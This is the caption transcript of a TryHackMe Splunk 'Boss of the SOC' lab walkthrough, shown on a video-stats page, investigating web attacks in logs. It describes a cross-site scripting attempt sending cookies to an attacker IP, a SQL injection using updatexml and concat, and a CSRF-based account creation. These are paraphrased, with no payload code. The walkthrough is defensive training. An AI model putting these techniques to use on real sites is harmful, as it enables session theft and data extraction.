Splunk 2 Boss of the SOC (BOTS) - 200 Series | TryHackMe | Splunk Analysis

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hey everybody my name is Ron and welcome to my walkthrough of the Splunk 2 task 4 200 series questions in this video we'll be using Splunk to see what events happen when cross-site scripting and SQL injections took place now hopefully you'll find this content useful and help you better understand Splunk my mission here is not just to reinforce my own learning but also to help you all grasp these Concepts more clearly whether you're just starting out or looking to sharpen your skills this walkthrough is crafted to guide you step by step and hey if you found this content valuable hit that like button and subscribe and without further Ado let's get started now let's go ahead and start Task 4 200 series questions we'll still be using the index Bots V2 and for question one we'll be using Amber and Tor question one what version of Tor Browser did Amber install to obfuscate her web browser so let's go ahead and plug in those terms let's make sure that that we choose all time and click the search button once the results populate let's go under interesting fields and look at image at the top we'll clearly see that the version that Amber used for tour to install was 7.0.4 Splunk the term image doesn't refer to a picture or a graphic instead within the context of Splunk it often refers to a binary executable or a process image that has been loaded or executed on the system next question what is the public ipv4 address of the server running www.ruertalk.com so let's go back to the search function type in site equals www.ruertalk.com once the results populate let's look at under interesting fields destination IP and we'll see that there are only two values showing up remember that IP address is starting at 172 are part of the private IP address range so our only other option is this 5242 208 228 okay next question provide the IP address of the system used to run a web vulnerability scan against brewertalk.com let's look at the hint which IP is hitting the hardest so going back to our search let's go under interesting fields and lists look for Source IP and it seems like this IP address starting with 45 has a high count of 8965 so let's check that out now that the results populated take a look at the first result one thing you'll notice here is there's a lot more activity being recorded for example on the first result under form data you see something interesting happening and its destination is Brewer talks private IP address if we look at another event we see the destination IP being Brewer talks private IP address Something Fishy going on under form data and it is coming from 4577 65211 and if you continue to browse through the results a lot of suspicious activity happening with this IP address so the IP address used to run a web Boulder ability scan is 4577 65 2-1-1 next question the IP address from question 2 is also being used by a likely different piece of software to attack a UR iPath what is the UR iPath so off the bat let's go under interesting Fields let's look at URI path and we'll see the Top Value being hit was member.php but since we're looking for the IP address we talked about in question two let's go ahead and verify that foreign so what we notice here is that there are only three events and if we look at form data it seems that something fishy is going on here it seems that a script is being injected and the location of the document is coming from this IP address and the JavaScript code is being redirected here and it is appending a document cookie so from the looks of it this URI query is an attempt at a cross-site scripting attack it seems like the attacker is trying to inject the script that when executed will redirect the user to their server at 4577 65 to 11 at Port 999 and send along the cookies of the current webpage as a metric parameter so the URI in question is member.php next question what SQL function is being abused on the UR iPath from the previous question so if we look at our first result let's look under form data what we'll see is they used update XML and concat functions to extract data from the database specifically they're trying to retrieve the password of a user from mybv users the user that's being registered is macmin the password they'll be using is mukaram the email that's being used is Mac at live.com and they'll be abusing update XML and concat and if we look at the source content we'll see the SQL injection attempt next question what was the value of the cookie that Kevin's browser transmitted to the malicious URL as part of an cross-scripting attack so let's check out the hint xss is associated with what tag since we'll be looking for Kevin let's go ahead and copy his name let's go ahead and clear this search put in Kevin and since we're looking for a cookie why not type in cookie so under interesting Fields let's look at cookie and we'll see that there are only a few values now we know that cookies are supposed to be unique but we see two cookies here with nearly the same data so we can assume that this is where the cross-site scripting attack took place to verify that let's go ahead and check out this value and browse the results if you look at the destination headers we'll see that this is where the cross-site scripting is taking place we'll see that they're making a new username by the name of K.I agarfield with a password your laws now this content is also the answer to the next question but we'll approach that a little bit differently next question what brewerytalk.com username was maliciously created by a spear phishing attack hint the attacker stole Kevin's csrf token and performed a trick from the domain squatters by using the homograph attack so what we can do here is just copy this token and we'll notice that there are only nine events now since we know that a user is being created typically you have to submit a form so we can look at interesting fields and let's look at form data we only have one value here and as we can see the username k i Agger field with a password beer lulls is being created so that is it for the task for 200 series questions and if you found this video helpful give me a thumbs up and hit that subscribe button thank you for watching and see you on the next one
Info
Channel: RonR1337
Views: 347
Rating: undefined out of 5
Keywords:
Id: hkWLCuDb3d8
Channel Id: undefined
Length: 8min 6sec (486 seconds)
Published: Tue Sep 19 2023
Related Videos
Splunk 2 Boss of the SOC (BOTS) - 100 Series Walkthrough | TryHackMe | Splunk Analysis
RonR1337
242
Practical #Splunk - Zero to Hero #cybersecnerd
cybersecnerd
7.9K
Cyber Incident Response with Splunk | TryHackMe Incident Handling with Splunk
Motasem Hamdan
16K
How to use splunk to analyze a realtime log | Splunk tutorial
DWBIADDA VIDEOS
69K
Investigating FTP with Splunk | TryHackMe Boss of the SOC v2
Motasem Hamdan
8.5K
AI Meets Pandas: A First Look at PandasAI
AI Tube
248
Mr. Robot CTF | TryHackMe
RonR1337
1.5K
Integrating AnyPoint Studio Logs with Splunk in MuleSoft: A Comprehensive Guide - Part 2
KLART Technologies
705
Splunk BOTS - Boss Of The SOC (v3) Walkthrough & Analysis
cwo1010
19K
Building the Formula 1 App with React Native
notJust․dev
77K
Log Analysis with Splunk | How to use Splunk to analyse a Real time Log | Splunk Use Cases | Edureka
edureka!
103K
Try Hack Me: Sysmon
stuffy24
3.2K
Splunk SIEM Basics For Beginners | TryHackMe Splunk: Basics
Motasem Hamdan
27K
Detecting SQL and XSS Web Application Attacks with Splunk | TryHackMe Splunk 2
Motasem Hamdan
8.9K
Try Hack Me: Windows Event Logs
stuffy24
4.9K
🔴 Let’s build ChatGPT Messenger 2.0 with REACT! (Next.js 13, Firebase, Tailwind CSS, TypeScript)
Sonny Sangha
1M
Try Hack Me: Sysinternals
stuffy24
2.1K
Agent Sudo CTF | TryHackMe | Steganography, Hydra, & John The Ripper
RonR1337
205
AZ-900 Azure Fundamentals Study Cram - 2022 Edition! - OVER 900,000 VIEWS!
John Savill's Technical Training
945K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.